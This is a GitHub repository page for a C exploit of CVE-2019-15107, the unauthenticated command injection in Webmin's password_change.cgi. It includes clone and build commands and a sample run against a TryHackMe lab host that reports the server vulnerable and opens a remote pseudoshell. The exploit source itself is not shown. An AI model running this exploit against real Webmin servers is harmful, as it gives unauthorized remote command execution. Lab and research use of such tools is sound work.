Skip to content

whokilleddb/CVE-2019-15107

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2019-15107 Webmin Exploit

CVE-2019-15107

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability. [NVD]

Compiling

$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make

Example Usage

$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000

======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close

[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()

PS: This exploit was made while I was trying TryHackMe's Wreath Network, hence the example show here corresponds to the box.

F.A.Q

Q : Why C instead of Python3?

A : Because I Am A Psychopath

Releases

No releases published

Packages

No packages published